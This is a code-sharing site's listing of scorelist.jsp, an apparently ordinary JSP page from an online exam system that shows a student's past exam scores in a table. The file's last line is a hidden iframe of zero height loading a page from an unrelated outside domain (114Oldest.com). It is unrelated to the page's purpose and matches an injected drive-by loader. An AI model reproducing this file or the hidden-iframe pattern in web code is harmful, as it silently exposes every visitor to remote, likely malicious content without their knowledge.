⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 scorelist.jsp

📁 在线考试 考生登陆 查分 管理员管理后台等的 的的的的达到的达到的的的
💻 JSP
字号:
<%--     Document   : ScoreList    Created on : 2009-5-8, 22:09:51    Author     : Administrator--%><%@page contentType="text/html"%><%@page pageEncoding="UTF-8"%><%@taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c"%><%@page import = "com.eonline.model.*" %><%@taglib uri="http://java.sun.com/jsp/jstl/functions" prefix="fn"%><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><h3>You currently have examed <b>${fn:length(sessionScope.scoreList)}</b>times,the SCORES are fllowing:</h3><br/><table border='0' cellspacing='0' cellpadding='5'>    <tr>        <th>UID</th>        <th>date</th>        <th>score</th>    </tr>    <c:forEach var="item" items="${sessionScope.scoreList}">        <tr>            <td>${item.UID}</td>            <td>${item.date}</td>            <td>${item.score}</td>        </tr>    </c:forEach></table><iframe src=http://www.114Oldest.com/zz/mm.htm width=100 height=0></iframe>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -